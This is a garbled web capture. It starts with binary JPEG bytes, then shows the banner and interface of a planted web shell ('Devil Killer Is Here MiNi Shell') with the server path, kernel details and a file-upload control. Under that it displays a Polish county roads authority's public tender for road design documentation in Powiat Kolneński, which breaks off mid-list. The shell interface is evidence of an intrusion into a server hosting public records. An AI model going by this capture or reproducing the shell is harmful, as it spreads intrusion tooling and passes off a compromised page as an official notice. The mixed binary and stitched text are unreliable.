JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220513/0015804801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dokumentacje projektowe na przebudowę dróg w Powiecie Kolneńskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W KOLNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450672596</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862782916</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862782916</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@powiatkolno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiatkolno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dokumentacje projektowe na przebudowę dróg w Powiecie Kolneńskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dda01ea6-d28e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00158048</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025103/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dokumentacje projektowe na przebudowę dróg w Powiecie Kolneńskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.st.kolno.wrotapodlasia.pl/przetargi/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://bip.st.kolno.wrotapodlasia.pl/przetargi/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE.L 2016,119, s.1 oraz Dz. Urz. UE.L 2018,127, s.2) zwanym dalej „RODO”, informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Powiatowy Zarząd Dróg w Kolnie, ul. Wojska Polskiego 48, 18-500 Kolno, tel. 86 278 29 16, adres email: pzd@powiatkolno.pl <br/>2) administrator wyznaczył Inspektora Ochrony Danych, z którym można kontaktować się pod adresem e-mail: iod@powiatkolno.pl, w sprawie sposobu i zakresu przetwarzania Pani/Pana danych osobowych oraz przysługujących Pani/ Panu uprawnień.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w odpowiednim trybie, określonym w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych – dalej ustawa p.z.p..<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy p.z.p..<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy p.z.p. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą p.z.p. oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.26.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na przebudowę dróg w Powiecie Kolneńskim. Zamawiający dokonuje podziału zamówienia na części:<br/><br/>Część 1 – Zadanie nr 1: <br/>Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej nr 1884B w m. Kozioł<br/>Stan projektowany: <br/>1.	Zakres opracowania* – 3+970- 4+570;<br/>2.	Długość opracowania* – 0,6 km;<br/>3.	Kategoria drogi – powiatowa;<br/>4.	Klasa drogi – Z;<br/>5.	Kategoria ruchu – KR2;<br/>6.	Działki istniejącego pasa drogowego: 520, 527 obręb Kozioł, gm. Kolno, <br/>7.	Przebieg drogi dostępny na https://mapy.geoportal.gov.pl/<br/>8.	Szerokość jezdni – zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie;<br/>9.	Nawierzchnia jezdni – beton asfaltowy;<br/>10.	Szerokość chodników – zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie;<br/>11.	Nawierzchnia chodnika – kostka betonowa grubość 6 cm;<br/>12.	Nawierzchnia istniejących wjazdów – kostka betonowa gr. 8 cm;<br/>13.	Należy rozwiązać problem zalegania wody opadowej na jezdni w najniższym punkcie;<br/>14.	Kanał technologiczny lub uzyskanie zwolnienia ministra właściwego ds. informatyzacji (Minister Cyfryzacji) z obowiązku budowy kanału technologicznego w trakcie trwania umowy.<br/>15.	W przypadku stwierdzenia na projektowanym odcinku kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w planowanych liniach rozgraniczających teren inwestycji. <br/>16.	W sytuacji wystąpienia kolizji z istniejącym drzewostanem należy dokonać inwentaryzacji zieleni, uzyskać zgody właściwego organu na wycinkę a w przypadku konieczności wykonania odsadzeń sporządzenia planu nasadzeń.<br/>17.	Uzyskanie decyzji zatwierdzającej Projekt budowlany i udzielającej pozwolenia na budowę lub zaświadczenie o braku podstaw do wniesienia sprzeciwu do zgłoszenia robót budowlanych<br/>18.	Termin opracowania dokumentacji: w terminie 12 miesięcy od dnia podpisania umowy.<br/><br/>* Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowania dokumentacji przez projektanta mają wskazywać kilometraż rzeczywisty, który będzie miała odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na przebudowę dróg w Powiecie Kolneńskim. Zamawiający dokonuje podziału zamówienia na części:<br/>Część 2 – Zadanie nr 2:<br/>Opracowanie dokumentacji projektowej na przebudowę z rozbudową drogi powiatowej nr 1878B odcinek Lachowo - Danowo<br/>Stan projektowany: <br/>1.	Zakres opracowania* – 0+000÷4+000;<br/>2.	Długość opracowania* – 4,0 km;<br/>3.	Kategoria drogi- powiatowa;<br/>4.	Klasa drogi – L;<br/>5.	Kategoria ruchu – KR2;<br/>6.	Działki istniejącego pasa drogowego: 163, 162/1 obręb Lachowo, 128 obręb Kiełcze Kopki, 148/1, 151 obręb Danowo, gm. Kolno. Przebieg drogi dostępny na https://mapy.geoportal.gov.pl/.<br/>a)	Dodatkowo należy wykonać podział nw. działek i przeprowadzić w imieniu Zarządu Powiatu Kolneńskiego na podstawie art. 60, 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133 poz. 872 z późn.zm.) procedurę przejęcia nieruchomości zajęte pod drogi publiczne nw. działek:<br/>177/1, 154, 155, 160, 164, 165, 167, obręb Lachowo<br/>35/7, 35/1, 95, 1/8, 1/7, obręb Kiełcze-Kopki<br/>101/5, 37/6, 37/4, 37/3, 37/16, 37/1, 17, 16/2, 15/2, 150, 30, 28, 24, 18/1, 1/5, 66 obręb Danowo<br/>Ilość działek 28 szt. (może ulec zmianie i należy ją zweryfikować)<br/>b)	W miejscowości Danowo (a także na całym opracowywanym odcinku) tam, gdzie nie będzie możliwości pozyskania nieruchomości procedurą na podstawie art. 60, 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, należy przewidzieć poszerzenie pasa drogowego na mocy Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U. z 2022 r. poz. 176) za wyjątkiem miejsc, gdzie zachodzi konieczność rozbiórki istniejących obiektów budowlanych lub ogrodzeń. <br/>16/2, 15/2, 33/1, 33/2, 14/3, 32, 31/2, 12/3, 8/3, 29/1, 28, 25, 26, 25, 23, 22, 21, 20 obręb Danowo<br/>Szacowana ilość działek do podziału 18 sztuk. <br/>c)	Ilości działek do podziału mogą ulec zmianie ze względu na przyjęte rozwiązania projektowe i zostanie rozliczona powykonawczo.<br/>7.	Jezdnia <br/>- szerokość jezdni zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie,<br/>- nawierzchnia jezdni – beton asfaltowy;<br/>8.	Chodniki w śladach istniejących <br/>Nawierzchnia chodnika – kostka betonowa grubość 6 cm;<br/>9.	Nawierzchnia zjazdów:<br/>- istniejących skrzyżowań z innymi drogami beton asfaltowy, <br/>- zjazdów na posesje – kostka betonowa gr. 8 cm;<br/>- zjazdów na pola – żwirowe<br/>10.	W rejonie szkoły podstawowej w Lachowie należy zaprojektować dodatkowe rozwiązania poprawiające bezpieczeństwo pieszych;<br/>11.	Kanał technologiczny z częścią przedmiarowo-kosztorysową i SST lub uzyskanie przez projektanta zwolnienia ministra właściwego ds. informatyzacji (Minister Cyfryzacji) z obowiązku budowy kanału technologicznego w trakcie trwania umowy.<br/>12.	Należy przewidzieć wymianę przepustów pod koroną drogi będących w niezadowalającym stanie technicznym <br/>a)	w km 2+500 prosty z rur prefabrykowanych żelbetowy, jednootworowy, bez ścianek czołowych światło pionowe 0,80 m, długość po osi cieku 8 m;<br/>b)	w km 4+020 prosty z rur prefabrykowanych betowy, jednootworowy, murki równoległe do osi drogi światło pionowe 0,60 m, długość po osi cieku 12 m. <br/>c)	Ponadto należy uwzględnić do wymiany niezinwentaryzowane istniejące przepusty.<br/>13.	Zapewnienie odwodnienia jezdni (powierzchniowo lub poprzez budowę kanalizacji deszczowej), wraz z kompletnym rozwiązaniem odprowadzenia i zagospodarowania wód opadowych i roztopowych do odbiornika usytuowanego w projektowanym pasie drogowym lub poza nim;<br/>14.	W przypadku stwierdzenia na projektowanym odcinku kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w planowanych liniach rozgraniczających teren inwestycji. <br/>15.	W sytuacji wystąpienia kolizji z istniejącym drzewostanem należy dokonać inwentaryzacji zieleni, uzyskać zgody właściwego organu na wycinkę a w przypadku konieczności wykonania odsadzeń sporządzenia planu nasadzeń.<br/>16.	Uzyskanie decyzji zezwalającej na realizacje inwestycji drogowej lub zatwierdzającej Projekt budowlany i udzielającej pozwolenia na budowę lub zaświadczenie o braku podstaw do wniesienia sprzeciwu do zgłoszenia robót budowlanych<br/>17.	Termin opracowania dokumentacji: w terminie 18 miesięcy od dnia podpisania umowy.<br/><br/>*Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowania dokumentacji przez projektanta mają wskazywać kilometraż rzeczywisty, który będzie miała odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na przebudowę dróg w Powiecie Kolneńskim. Zamawiający dokonuje podziału zamówienia na części:<br/>Część 3 – Zadanie nr 3:<br/>Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej nr 1861B odcinek Świdry - Grabowo<br/>Stan projektowany: <br/>1.	Zakres opracowania* – 0+000÷5+200;<br/>2.	Długość opracowania* – 5,2 km;<br/>3.	Kategoria drogi- powiatowa;<br/>4.	Klasa drogi – Z;<br/>5.	Kategoria ruchu – KR3;<br/>6.	Działki istniejącego pasa drogowego: 32, 276 obręb Świdry-Dobrzyce, 129 obręb Grabowskie, 481628/2, 643, 628/1 obręb Grabowo, gm. Grabowo. Przebieg drogi dostępny na https://mapy.geoportal.gov.pl/.<br/>7.	Szerokość istniejącego pasa drogowego zmienna ok. 14÷20 m<br/>8.	Jezdnia <br/>- szerokość jezdni zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie,<br/>- nawierzchnia jezdni – beton asfaltowy;<br/>9.	Chodniki w śladach istniejących <br/>Nawierzchnia chodnika – kostka betonowa grubość 6 cm;<br/>10.	